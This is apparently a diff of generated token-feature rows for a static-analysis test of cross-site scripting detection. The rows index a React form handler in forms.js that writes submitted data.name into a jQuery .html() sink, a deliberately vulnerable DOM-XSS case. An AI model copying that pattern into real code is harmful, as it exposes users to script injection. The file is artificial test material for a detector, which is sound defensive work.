tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:72:19:72:27 | data.name | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | | autogenerated/Xss/XssThroughDom/forms.js:72:19:72:27 | data.name | enclosingFunctionName | HookForm | | autogenerated/Xss/XssThroughDom/forms.js:72:19:72:27 | data.name | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:24:72:27 | name | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:24:72:27 | name | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:72:24:72:27 | name | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:24:72:27 | name | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:24:72:27 | name | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:75:10:80:3 | (\\n < ... rm>\\n ) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:75:10:80:3 | (\\n < ... rm>\\n ) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:75:10:80:3 | (\\n < ... rm>\\n ) | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:75:10:80:3 | (\\n < ... rm>\\n ) | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:75:10:80:3 | (\\n < ... rm>\\n ) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:5:79:11 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:5:79:11 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:76:5:79:11 | | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:5:79:11 | | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:5:79:11 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:6:76:9 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:6:76:9 | form | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:76:6:76:9 | form | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:6:76:9 | form | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:6:76:9 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:18 | onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:18 | onSubmit | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:18 | onSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:18 | onSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:18 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:11:76:43 | onSubmi ... ubmit)} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:32 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:32 | handleSubmit | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:32 | handleSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:32 | handleSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:32 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | exceptional return of handleS ... Submit) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | exceptional return of handleS ... Submit) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | exceptional return of handleS ... Submit) | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | exceptional return of handleS ... Submit) | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | exceptional return of handleS ... Submit) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | handleS ... Submit) | assignedToPropName | onSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | handleS ... Submit) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | handleS ... Submit) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | handleS ... Submit) | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | handleS ... Submit) | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:21:76:42 | handleS ... Submit) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:76:34:76:41 | onSubmit | CalleeFlexibleAccessPath | handleSubmit | | autogenerated/Xss/XssThroughDom/forms.js:76:34:76:41 | onSubmit | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:76:34:76:41 | onSubmit | calleeImports | react-hook-form | @@ -24412,6 +160795,73 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:76:34:76:41 | onSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | | autogenerated/Xss/XssThroughDom/forms.js:76:34:76:41 | onSubmit | enclosingFunctionName | HookForm | | autogenerated/Xss/XssThroughDom/forms.js:76:34:76:41 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:76:45:77:8 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:76:45:77:8 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:76:45:77:8 | \\n | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:76:45:77:8 | \\n | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:76:45:77:8 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:9:77:64 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:9:77:64 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:9:77:64 | | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:9:77:64 | | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:9:77:64 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:10:77:14 | input | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:10:77:14 | input | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:10:77:14 | input | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:10:77:14 | input | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:10:77:14 | input | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:19 | name | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:19 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:19 | name | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:19 | name | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:19 | name | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:16:77:26 | name="name" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:21:77:26 | "name" | assignedToPropName | name | +| autogenerated/Xss/XssThroughDom/forms.js:77:21:77:26 | "name" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:21:77:26 | "name" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:21:77:26 | "name" | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:21:77:26 | "name" | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:21:77:26 | "name" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:30 | ref | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:30 | ref | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:30 | ref | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:30 | ref | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:30 | ref | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:28:77:61 | ref={re ... rue })} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:40 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:40 | register | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:40 | register | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:40 | register | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:40 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | exceptional return of registe ... true }) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | exceptional return of registe ... true }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | exceptional return of registe ... true }) | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | exceptional return of registe ... true }) | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | exceptional return of registe ... true }) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | registe ... true }) | assignedToPropName | ref | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | registe ... true }) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | registe ... true }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | registe ... true }) | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | registe ... true }) | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:33:77:60 | registe ... true }) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:77:42:77:59 | { required: true } | CalleeFlexibleAccessPath | register | | autogenerated/Xss/XssThroughDom/forms.js:77:42:77:59 | { required: true } | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:77:42:77:59 | { required: true } | calleeImports | react-hook-form | @@ -24420,6 +160870,21 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:77:42:77:59 | { required: true } | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | | autogenerated/Xss/XssThroughDom/forms.js:77:42:77:59 | { required: true } | enclosingFunctionName | HookForm | | autogenerated/Xss/XssThroughDom/forms.js:77:42:77:59 | { required: true } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:51 | required | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:51 | required | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:51 | required | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:51 | required | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:51 | required | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:44:77:57 | required: true | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:77:54:77:57 | true | CalleeFlexibleAccessPath | register | | autogenerated/Xss/XssThroughDom/forms.js:77:54:77:57 | true | InputAccessPathFromCallee | 0.required | | autogenerated/Xss/XssThroughDom/forms.js:77:54:77:57 | true | InputArgumentIndex | 0 | @@ -24430,6 +160895,370 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:77:54:77:57 | true | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | | autogenerated/Xss/XssThroughDom/forms.js:77:54:77:57 | true | enclosingFunctionName | HookForm | | autogenerated/Xss/XssThroughDom/forms.js:77:54:77:57 | true | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:77:65:78:8 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:77:65:78:8 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:77:65:78:8 | \\n | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:77:65:78:8 | \\n | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:77:65:78:8 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:78:9:78:31 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:78:9:78:31 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:78:9:78:31 | | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:78:9:78:31 | | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:78:9:78:31 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:78:10:78:14 | input | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:78:10:78:14 | input | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:78:10:78:14 | input | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:78:10:78:14 | input | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:78:10:78:14 | input | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:19 | type | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:19 | type | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:19 | type | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:19 | type | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:19 | type | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | contextFunctionInterfaces | 